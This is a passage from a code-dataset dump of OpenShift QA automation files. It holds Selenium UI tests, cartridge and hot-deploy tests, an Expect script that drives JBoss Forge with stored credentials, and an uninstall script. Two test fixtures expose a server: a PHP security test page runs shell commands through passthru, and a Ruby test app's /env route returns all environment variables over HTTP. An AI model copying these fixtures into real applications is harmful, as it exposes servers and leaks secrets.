suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of embed_jenkins2scalable_app.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.644444465637207, "alphanum_fraction": 0.6888889074325562, "avg_line_length": 43.66666793823242, "blob_id": "6c91a3823feac0e064ddec1ba31bba7c095b6c2b", "content_id": "88c18f421d957b56d3ec05cb561bd82e24eafdcf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 135, "license_type": "no_license", "max_line_length": 64, "num_lines": 3, "path": "/python-simple-cmd/uninstall.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "sudo rm -rf /usr/lib/python2.7/site-packages/scmd-0.1-py2.7.egg/\nsudo rm -rf /usr/bin/scmd \nsudo rm -rf ./build/ dist/ scmd.egg-info/\n\n" }, { "alpha_fraction": 0.4911894202232361, "alphanum_fraction": 0.5539647340774536, "avg_line_length": 23.54054069519043, "blob_id": "49e0323957489406bf35592d015ee1c37dd80d6c", "content_id": "ac41a1d5561bf9e5c18dd620edb9e3caaa9570f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 908, "license_type": "no_license", "max_line_length": 75, "num_lines": 37, "path": "/automation/open/testmodules/RT/security/data/delete_old_files_from_tmp_devenv.php", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "<?php\necho \"Welcome~~~~~~~\\n\";\necho \"###Test Case###: Security - Delete old files from tmp\\n\";\nif(!empty($_GET[\"action\"])) {\n $command1 = \"touch -t 1001010101 /tmp/tmp_old 2>&1\";\n echo \"Command 1: \".$command1.\"\\n\";\n passthru($command1, $ret1);\n\n $command2 = \"touch -t 1001010101 /var/tmp/var_tmp_old 2>&1\";\n echo \"Command 2: \".$command2.\"\\n\";\n passthru($command2, $ret2);\n\n $command = \"ls -l /tmp 2>&1\";\n echo \"Command: \".$command.\"\\n\";\n passthru($command, $ret_tmp);\n\n if($ret1 == 0 && $ret2 == 0){\n echo \"RESULT=0\\n\";\n } else {\n echo \"RESULT=1\\n\";\n }\n} else {\n $command1 = \"ls -l /tmp/tmp_old 2>&1 || ls -l /var/tmp/var_tmp_old 2>&1\";\n echo \"Command 1: \".$command1.\"\\n\";\n passthru($command1, $ret1); \n\n $command = \"ls -l /tmp 2>&1\";\n echo \"Command: \".$command.\"\\n\";\n passthru($command, $ret_tmp);\n\n if($ret1 == 0){\n echo \"RESULT=0\\n\";\n } else {\n echo \"RESULT=1\\n\";\n }\n}\n?>\n" }, { "alpha_fraction": 0.5378743410110474, "alphanum_fraction": 0.5564689636230469, "avg_line_length": 34.47222137451172, "blob_id": "e92441bf2b15730c99b8c6f0e8f7cfe91e768d7b", "content_id": "75b9d87c06c5baac7b93aebb9107358c7675be00", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5109, "license_type": "no_license", "max_line_length": 101, "num_lines": 144, "path": "/automation/open/testmodules/UI/web/case_141708.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_141707.py\n# Date: 2012/07/04 10:56\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass CheckCommunityLink(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n web.go_to_community()\n time.sleep(5)\n \n #Assert all the links of Community page.\n web.assert_text_equal_by_xpath('Overview',\n '''//div[@id='block-menu_block-1']/div/div/ul/li/a''')\n web.assert_text_equal_by_xpath('Blog',\n '''//div[@id='block-menu_block-1']/div/div/ul/li[2]/a''')\n web.assert_text_equal_by_xpath('Forum',\n '''//div[@id='block-menu_block-1']/div/div/ul/li[3]/a''')\n web.assert_text_equal_by_xpath('Vote on Features',\n '''//div[@id='block-menu_block-1']/div/div/ul/li[4]/a''')\n web.assert_text_equal_by_xpath('Get Involved',\n '''//div[@id='block-menu_block-1']/div/div/ul/li[5]/a''')\n web.assert_text_equal_by_xpath('Open Source',\n '''//div[@id='block-menu_block-1']/div/div/ul/li[5]/ul/li/a''')\n web.assert_text_equal_by_xpath('Get the Bits',\n '''//div[@id='block-menu_block-1']/div/div/ul/li[5]/ul/li[2]/a''')\n web.assert_text_equal_by_xpath('Events',\n '''//div[@id='block-menu_block-1']/div/div/ul/li[6]/a''')\n web.assert_text_equal_by_xpath('Videos',\n '''//div[@id='block-menu_block-1']/div/div/ul/li[7]/a''')\n \n \n \n #Check all the links of Community page.\n #Overview\n web.click_element_by_xpath('''//div[@id='block-menu_block-1']/div/div/ul/li/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('Welcome to OpenShift',\n '''//div[@id='content']/div/div/div/div[3]/div/h1/div''',\n 'Overview link is broken')\n\n #Blog\n web.go_to_community()\n web.click_element_by_xpath('''//div[@id='block-menu_block-1']/div/div/ul/li[2]/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('Blogs',\n '''//div[@id='content']/div/div/div/div[3]/div/h1/div''',\n 'Blog link is broken')\n\n #Forum\n web.go_to_community()\n web.click_element_by_xpath('''//div[@id='block-menu_block-1']/div/div/ul/li[3]/a''')\n web.assert_text_equal_by_xpath('Forums',\n '''//div[@id='content']/div/div/div/div[3]/div/h1/div''',\n 'Forum link is broken')\n\n #Vote on Features\n web.go_to_community()\n web.click_element_by_xpath('''//div[@id='block-menu_block-1']/div/div/ul/li[4]/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('Vote on Features',\n '''//div[@id='content']/div/div/div/div[3]/div/h1/div''',\n 'Vote on Features link is broken')\n\n #Get Involved\n web.go_to_community()\n web.click_element_by_xpath('''//div[@id='block-menu_block-1']/div/div/ul/li[5]/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('Get Involved',\n '''//div[@id='content']/div/div/div/div[3]/div/h1/div''',\n 'Get Involved link is broken')\n\n #Open Source\n web.go_to_community()\n web.click_element_by_xpath('''//div[@id='block-menu_block-1']/div/div/ul/li[5]/ul/li/a''')\n time.sleep(5)\n web.assert_text_equal_by_xpath('OpenShift is Open Source',\n '''//div[@id='content']/div/div/div/div[3]/div/h1/div''',\n 'Open Source link is broken')\n\n #Get the Bits\n web.go_to_community()\n web.click_element_by_xpath('''//div[@id='block-menu_block-1']/div/div/ul/li[5]/ul/li[2]/a''')\n time.sleep(5)\n web.assert_text_equal_by_xpath('OpenShift Origin Source Code',\n '''//div[@id='content']/div/div/div/div/div/h1''',\n 'Get the bits link is broken')\n\n #Events\n web.go_to_community()\n web.click_element_by_xpath('''//div[@id='block-menu_block-1']/div/div/ul/li[6]/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('Events',\n '''//div[@id='content']/div/div/div/div[3]/div/h1/div''',\n 'Events link is broken')\n \n #Videos\n web.go_to_community()\n web.click_element_by_xpath('''//div[@id='block-menu_block-1']/div/div/ul/li[7]/a''')\n time.sleep(5)\n web.assert_text_equal_by_xpath('Videos',\n '''//div[@id='content']/div/div/div/div[3]/div/h1/div''',\n 'Videos link is broken')\n\n self.tearDown()\n\n return self.passed(\"Case 141708 test passed.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CheckCommunityLink)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_141708.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5913897156715393, "alphanum_fraction": 0.6231117844581604, "avg_line_length": 21.049999237060547, "blob_id": "4a4e8c47d07a155de80cd159db6f01ea72878727", "content_id": "cf695b87560bfb6273608c24d2b037d2736128a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1324, "license_type": "no_license", "max_line_length": 113, "num_lines": 60, "path": "/automation/open/testmodules/UI/web/case_122359.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_122359.py\n# Date: 2012/08/06 10:56\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass Create_delete_python_app(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n web.login()\n \n #Create python application\n web.create_app(\"python-2.6\", \"python2\")\n time.sleep(10) \n web.click_element_by_link_text('''My Applications''')\n time.sleep(2)\n web.click_element_by_link_text('''http://python2-'''+web.domain+'''.'''+web.platform+'''.rhcloud.com/''')\n time.sleep(5)\n web.check_title(\"Welcome to OpenShift\")\n web.delete_last_app(\"python2\")\n\n self.tearDown()\n\n return self.passed(\"Case 122359 test passed.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Create_delete_python_app)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_122359.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6045933961868286, "alphanum_fraction": 0.6170080900192261, "avg_line_length": 34.010868072509766, "blob_id": "3bf8ac4135e7d92950bd42706650d8784b3e9f95", "content_id": "c584b97346b60a25a087b1a6b05d1e993f6ac29c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3222, "license_type": "no_license", "max_line_length": 162, "num_lines": 92, "path": "/automation/open/testmodules/RT/cartridge/cdi_application_support.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[US504][rhc-cartridge]JBoss cartridge: CDI application support\nhttps://tcms.engineering.redhat.com/case/122406/\n\"\"\"\nimport sys, os, re, time, random\n\nimport testcase\nimport common\nimport OSConf\nimport rhtest\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[US504][rhc-cartridge]JBoss cartridge: CDI application support\"\n\n self.app_name = \"weldguess\"\n self.git_repo = \"./%s\" % self.app_name\n self.app_type = common.app_types[\"jbossas\"]\n tcms_testcase_id=122406\n common.env_setup()\n\n self.steps_list = []\n\n def finalize(self):\n os.system(\"rm -rf %s* \"%(self.app_name))\n\nclass CdiApplicationSupport(OpenShiftTest):\n\n def test_method(self):\n # 1.Create an app\n self.steps_list.append( testcase.TestCaseStep(\"1. Create an jbossas app\",\n common.create_app,\n function_parameters=[self.app_name,self.app_type,self.config.OPENSHIFT_user_email,self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n\n # 2.Copy weldguess.war to <app_repo>/deployments\n self.steps_list.append(testcase.TestCaseStep(\"2.Copy weldguess.war to /tmp/reponame/deployments\",\n \"cp %s/app_template/weldguess.war %s/deployments && cd %s/deployments && touch weldguess.war.dodeploy\" % (WORK_DIR, self.git_repo, self.git_repo),\n expect_description=\"Copy succeed\",\n expect_return=0))\n\n # 3.Git push all the changes\n self.steps_list.append(testcase.TestCaseStep(\"3.Git push all the changes\",\n \"cd %s && git add . && git commit -am t && git push\" % (self.git_repo),\n expect_description=\"Git push should succeed\",\n expect_return=0))\n\n # 4.Check app via browser\n def get_app_url(app_name):\n def closure():\n return OSConf.get_app_url(app_name) + \"/weldguess/home.jsf\"\n return closure\n\n self.steps_list.append(testcase.TestCaseStep(\"4. Access the app's URL\",\n common.grep_web_page,\n function_parameters=[get_app_url(self.app_name), \"Guess a number\", \"-H 'Pragma: no-cache'\", 3, 6],\n expect_description=\"'Guess a number' should be found in the web page\",\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CdiApplicationSupport)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.7075605988502502, "alphanum_fraction": 0.7218259572982788, "avg_line_length": 24.035715103149414, "blob_id": "668e30ea637b7c091d14915b1e8a35a9b52d6fc7", "content_id": "0d1d5584ce80fad52b5e8538f751c2d6fac87dba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 701, "license_type": "no_license", "max_line_length": 93, "num_lines": 28, "path": "/automation/open/testmodules/RT/hot_deploy/jbossews_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nOct 23, 2012\n\"\"\"\n\nimport rhtest\nimport common\nfrom jbossas_without_jenkins import JBossHotDeployWithoutJenkins\n\nclass EWSHotDeployWithoutJenkins(JBossHotDeployWithoutJenkins):\n def __init__(self, config):\n JBossHotDeployWithoutJenkins.__init__(self, config)\n self.config.application_type = common.app_types['jbossews']\n self.config.summary = \"[US2513] Hot deployment support for JBossEWS- without Jenkins\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EWSHotDeployWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.683068037033081, "alphanum_fraction": 0.7178003191947937, "avg_line_length": 23.678571701049805, "blob_id": "791b3351052054e69486e37018020670948a541c", "content_id": "e0fc3308e9245fde4b219d5f644b33cb1b9039e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 691, "license_type": "no_license", "max_line_length": 104, "num_lines": 28, "path": "/automation/open/testmodules/RT/hot_deploy/ruby19_with_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nAug 28, 2012\n\n\"\"\"\nimport rhtest\nimport common\nfrom ruby19_without_jenkins import Ruby19HotDeployWithoutJenkins\n\nclass Ruby19HotDeployWithJenkins(Ruby19HotDeployWithoutJenkins):\n def __init__(self, config):\n Ruby19HotDeployWithoutJenkins.__init__(self, config)\n self.config.jenkins_is_needed = True\n self.config.summary = \"[US2443]Hot deployment support for application - with Jenkins - ruby-1.9\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Ruby19HotDeployWithJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6047988533973694, "alphanum_fraction": 0.6330274939537048, "avg_line_length": 22.213115692138672, "blob_id": "33835b5cf309977af5c2b2ccff1bbdfb4cd60a31", "content_id": "72ce4d73ce55b93eebde40e8b3ff8a4b5a1b2c6b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1417, "license_type": "no_license", "max_line_length": 124, "num_lines": 61, "path": "/automation/open/testmodules/UI/web/case_138790.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_138790.py\n# Date: 2012/07/25 10:56\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass Create_Long_domain(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n web.login()\n \n #Create duplicate domain\n web.go_to_account_page()\n time.sleep(10)\n web.click_element_by_link_text(\"Change your namespace...\")\n time.sleep(5)\n web.clear_element_value(\"domain_name\")\n web.input_by_id(\"domain_name\", \"QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ\") \n web.click_element_by_id(\"domain_submit\")\n time.sleep(10)\n web.assert_text_equal_by_xpath(\"Namespace is too long. Maximum length is 16 characters.\", '''//form/ul/li''') \n\n self.tearDown()\n\n return self.passed(\"Case 138790 test passed.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Create_Long_domain)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_138790.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6718061566352844, "alphanum_fraction": 0.6938325762748718, "avg_line_length": 25.705883026123047, "blob_id": "be25f36ada92cd9c086b9205b32e9742fb1b03a3", "content_id": "ee82ad826978b834ef04627da0f8df692ee34138", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 454, "license_type": "no_license", "max_line_length": 58, "num_lines": 17, "path": "/automation/open/bin/rhtest", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os\nimport sys\nfile_path = os.path.dirname(os.path.realpath(__file__))\nlib_path1 = os.path.abspath(file_path + \"/../lib\")\nlib_path2 = lib_path1 + \"/supports\"\nlib_path3 = os.path.abspath(file_path + \"/../testmodules\")\nsys.path.append(lib_path1)\nsys.path.append(lib_path2)\nsys.path.append(lib_path3)\nimport rhtestrunner\n\nrv = rhtestrunner.runtest(sys.argv)\nif int(rv) == 1: #PASSED\n sys.exit(0)\nelse:\n sys.exit(1+int(rv))\n" }, { "alpha_fraction": 0.6034536957740784, "alphanum_fraction": 0.6162998676300049, "avg_line_length": 26.685131072998047, "blob_id": "a8754e0880c6580c2e138ed87f559eb32eee3a40", "content_id": "4ea6aee0d6b593d644e7274685ce4cec2200ac7d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9497, "license_type": "no_license", "max_line_length": 181, "num_lines": 343, "path": "/automation/open/testmodules/RT/cartridge/forge_java_client_tools.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n#\n# File name: forge_java_client_tools.py\n# Date: 2012/02/27 08:56\n# Author: [email protected]\n#\n\nimport sys\nimport subprocess\nimport os\nimport string\nimport re\n\nimport rhtest\nimport testcase, common, OSConf, pexpect\n\n#TODO: get the version from TCMS arguments\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n self.summary= \"[US1413][UI] Change SeamForge plugin to use the official Java client tools\"\n self.app_name = 'forgeapp'\n tcms_testcase_id = 121961\n\n try:\n #TODO: this could be received from framework\n self.forge_version = os.environ[\"forge_version\"]\n except:\n self.forge_version = '1.0.0.Final'\n #forge_version = '1.0.0.Beta3'\n\n common.env_setup()\n\n forge_dir = \"%s/forge/\"%os.getcwd()\n os.environ['FORGE_HOME'] = forge_dir\n os.environ['PATH'] += \":%s/bin\"%forge_dir\n\n def finalize(self):\n os.system(\"rm -rf forge-*; rm -rf forge; rm -rf %s\"%self.app_name )\n\nclass ForgeJavaClient(OpenShiftTest):\n def test_method(self):\n steps = []\n steps.append(testcase.TestCaseStep(\"Check Java/Expect/Maven3 version\" ,\n \"java -version 2>&1|grep OpenJDK && javac -version 2>&1 | grep 1.6 && expect -version && mvn -version |grep 'Apache Maven 3' && echo PASS\",\n expect_string_list = [\"PASS\"],\n expect_description = \"Javac/Expect/Maven3 should be installed\",\n expect_return=0))\n\n steps.append(testcase.TestCaseStep(\"Check if domain exists\",\n 'rhc-domain-info -l %s -p %s'%(self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd),\n unexpect_string_list=[\"A user with rhlogin '%s' does not have a registered domain.\"%self.config.OPENSHIFT_user_email],\n expect_return=0))\n\n steps.append(testcase.TestCaseStep(\"Install JbossForge\",\n '''\n rm -rf $HOME/.m2 &&\n rm -rf $HOME/.forge &&\n wget 'https://repository.jboss.org/nexus/service/local/artifact/maven/redirect?r=releases&g=org.jboss.forge&a=forge-distribution&v=%s&e=zip' -O forge-package.zip &&\n unzip forge-package.zip &&\n rm -f forge-package.zip &&\n ln -s forge-* forge \n '''%(self.forge_version),\n expect_return=0,\n expect_description=\"JbossForge Installation should pass\"))\n\n steps.append(testcase.TestCaseStep(\"Run basic jboss tools commands commands\", \n self.check_jboss_forge,\n expect_return = 0,\n expect_description = \"All of the JBossForge commands should pass\"))\n\n steps.append(testcase.TestCaseStep(\"Destroy that application\", \n common.destroy_app,\n function_parameters = [self.app_name, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_description = \"The application should not exist\",\n expect_return=\"!0\"))\n\n case = testcase.TestCase(self.summary, steps)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n def check_jboss_forge(self):\n expect_file = 'forge.expect'\n f = open(expect_file, 'w')\n\n f.write('''#!/usr/bin/expect --\n#it seems that colors in shell makes problems with matching\n#so, what you see is not what is in the buffer\n\nset app_name %s\nset username %s\nset password %s\n\nset send_slow {10 .001}\nset send_human {.1 .3 1 .05 2}\nproc dprint {msg} {\n send_user \"\\\\nDEBUG: $msg\\\\n\"\n}\n\nproc abort {msg} {\n send \"exit\\\\n\"\n send_user \"ABORT() $msg\\\\n\"\n exit 254\n}\n\nspawn forge/bin/forge\n\nexpect {\n -timeout 180\n \"no project*\\$*\" { dprint \"OK: found initial prompt\" }\n timeout { abort \"timeout: No initial prompt.\"}\n}\n#\n# forge list-plugins\n#\nsend \"forge list-plugins\\\\n\"\nexpect {\n -timeout 20\n \"no project*\\$*\" { dprint \"OK: forge list-plugins\"}\n timeout { abort \"Unable to execute forge list-plugins command\" }\n}\n\n#\n# new -project\n#\nsend \"new-project --named forge-openshift-demo --topLevelPackage org.jboss.forge.openshift\\\\n\"\nexpect {\n \"Use*as project directory*\" { send \"Y\\\\n\" }\n}\nexpect {\n -timeout 30 \n \"SUCCESS*\" { dprint \"OK: new-project\" }\n timeout {abort \"timeout: new-project ...\"}\n}\nexpect {\n -timeout 60 \n \"forge-openshift-demo*forge-openshift-demo*\\$*\" { dprint \"OK: CLI\" }\n timeout {abort \"timeout: no prompt after new-project\"}\n}\nexpect * ;#clean the buffer\n#\n# forge install plugin\n#\nsend \"forge install-plugin openshift-express\\\\n\"\nexpect {\n -timeout 900\n \"BUILD SUCCESS*\\\\n\" { dprint \"OK: BUILD SUCCESS\" }\n timeout {abort \"timeout: BUILD SUCCESS\"}\n}\nexpect {\n -timeout 20 \n \"SUCCESS*Installed from\" { dprint \"OK: Installed from\"}\n timeout { abort \"timeout: Installed from\" }\n}\nexpect {\n -timeout 20 \n \"forge-openshift-demo*forge-openshift-demo*\\$*\" { dprint \"OK: Installation done.\"}\n timeout { abort \"timeout: End of installation\" }\n}\nexpect * ;#clean the buffer\nsend \"\\\\n\"\nsend \"\\\\n\"\nexpect {\n \"forge-openshift-demo*forge-openshift-demo*\\$*\"\n}\nsleep 5\n#\n# rhc-expect setup\n#\nsend -s \"rhc-express setup --app $app_name \\\\n\"\nexpect {\n \"Enter your Red Hat Login\" {send -s \"$username\\\\n\"}\n}\nsleep 5\nexpect {\n \"Enter your Red Hat Login password\" {send -s \"$password\\\\n\"}\n}\nsleep 5\nexpect {\n -timeout 180 \n \"Initialized empty*\" { dprint \"OK: password sent\"}\n \"ERROR*\" { abort \"Something wrong with password\" }\n \"Caused by: *\" { abort \"Something wrong with password\" }\n #timeout { abort \"timeout:Waiting for password prompt\"}\n}\nexpect {\n -timeout 3000 \n \"SUCCESS*Installed*successfully\" { dprint \"OK: Installation of $app_name - success\" }\n \"Caused by: *\" { abort \"Some Exception ?\" }\n timeout { abort \"timeout:Waiting for successful setup is never ending...\"}\n}\n\nexpect * ;#clean the buffer\n\n#\n# servlet setup\n#\nsend -s \"servlet setup\\\\n\"\nexpect {\n -timeout 20\n \"Facet*requires packaging*\" { send \"Y\\\\n\" }\n timeout { abort \"???\" } \n}\nexpect {\n -timeout 60\n \"SUCCESS*Installed*successfully\" { dprint \"OK: Installed successfully\" }\n timeout { abort \"???\" } \n}\nexpect {\n -timeout 60\n \"SUCCESS*Servlet is installed\" { dprint \"OK: Servlet is installed\" }\n timeout { abort \"Unable to install servlet\" } \n}\nexpect {\n -timeout 60\n \"SUCCESS*Servlet is installed\\n\"\n timeout { abort \"Unable to install servlet support.\" } \n}\n#\n# git add ...\n#\nsend -s \"git add pom.xml src/\\\\n\"\nexpect {\n -timeout 90\n \"forge-openshift-demo*forge-openshift-demo*\\$*\" {dprint \"Git add \"}\n timeout {abort \"??\" }\n}\nsend -s \"rhc-express deploy\\\\n\"\nexpect {\n -timeout 90\n \"remote: Starting application\" {dprint \"Starting application\"}\n timeout { abort \"No CLI after rhc-express deploy\" }\n}\n\n#\n# rhc-express status\n#\nsend -s \"rhc-express status\\\\n\"\nexpect {\n -timeout 60\n \"Enter your Red Hat Login*\" {send -s \"$username\\\\n\"}\n timeout {abort \"No Red Hat Login prompt\" }\n}\nsleep 5\nexpect {\n \"Enter the application name\" {send -s \"$app_name\\\\n\"}\n}\nsleep 5\nexpect {\n \"Enter your Red Hat Login password\" {send -s \"$password\\\\n\"}\n timeout { abort \"No password prompt\"}\n}\nsleep 5\nexpect {\n -timeout 280 \n \"forge-openshift-demo*forge-openshift-demo*\\$*\" {dprint \"OK\"}\n}\nexpect * ; #clean the buffer\n#\n# rhc-express list\n#\nsend -s \"rhc-express list\\\\n\"\nexpect {\n -timeout 60\n \"Enter your Red Hat Login*\" {send -s \"$username\\\\n\"}\n timeout {abort \"No Red Hat Login prompt\" }\n}\nsleep 5\nexpect {\n \"Enter your Red Hat Login password\" {send -s \"$password\\\\n\"}\n timeout { abort \"No password prompt\"}\n}\nexpect {\n -timeout 30\n \"Applications on OpenShift Express\" {dprint \"List - OK\"}\n timeout { abort \"No password prompt\"}\n}\nexpect *;\nsleep 5\n#\n# rhc-express destroy\n#\nsend -s \"rhc-express destroy\\\\n\"\nexpect {\n -timeout 60\n \"Enter your Red Hat Login*\" {send -s \"$username\\\\n\"}\n timeout {abort \"No Red Hat Login prompt\" }\n}\nsleep 5\nexpect {\n \"Enter the application name\" {send -s \"$app_name\\\\n\"}\n}\nsleep 5\nexpect {\n \"Enter your Red Hat Login password\" {send -s \"$password\\\\n\"}\n timeout { abort \"No password prompt\"}\n}\nsleep 5\nexpect {\n -timeout 30\n \"About to destroy application\" { send -s \"Y\\\\n\" }\n timeout { abort \"No destroy prompt\"}\n}\nexpect {\n -timeout 90\n \"Destroyed application $app_name on\" { dprint \"Deleted.\" }\n timeout { abort \"Unable to destroy application\" }\n}\n\nsend -s \"exit\\\\n\"\nclose\nexit 0 '''%(self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd))\n f.close()\n (status, output) = common.command_getstatusoutput(\"chmod +x %s;./%s\"%(expect_file,expect_file))\n return status\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(ForgeJavaClient)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of forge_java_client_tools.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5800807476043701, "alphanum_fraction": 0.5989232659339905, "avg_line_length": 19.63888931274414, "blob_id": "1ee77b9700f05015bdb5422c16b58eddbee86769", "content_id": "1f6006102853e49428ddf580426bfc9107fdafda", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 743, "license_type": "no_license", "max_line_length": 133, "num_lines": 36, "path": "/automation/open/testmodules/RT/cartridge/app_template/universal/ruby/config.ru", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "require 'rack/lobster'\nif RUBY_VERSION.include?(\"1.8.\")\n require 'thread-dump'\nelsif RUBY_VERSION.include?(\"1.9.\")\n require './thread-dumper'\nend\nrequire 'mysql'\n\nmap '/health' do\n health = proc do |env|\n [200, { \"Content-Type\" => \"text/html\" }, [\"1\"]]\n end\n run health\nend\n\nmap '/lobster' do\n run Rack::Lobster.new\nend\n\nmap '/' do\n welcome = proc do |env|\n [200, { \"Content-Type\" => \"text/plain\" }, [\"Usage: #{ENV['OPENSHIFT_APP_DNS']}/<group>\\nValid groups are 'shell','env','mysql'\"]]\n end\n run welcome\nend\n\nmap '/env' do\n env = proc do |env|\n result = String.new\n ENV.to_hash.each do |key, value|\n result << \"#{key}=#{value}\\n\"\n end\n [200, { \"Content-Type\" => \"text/plain\" }, [result]]\n end\n run env\nend\n" }, { "alpha_fraction": 0.482445627450943, "alphanum_fraction": 0.4874122142791748, "avg_line_length": 38.452701568603516, "blob_id": "6d5f4338bc7fd8f84a0bbe4c7248ce91c9e23130", "content_id": "a79deb3006a2e78f4459a030fabc5566818f0fd3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", 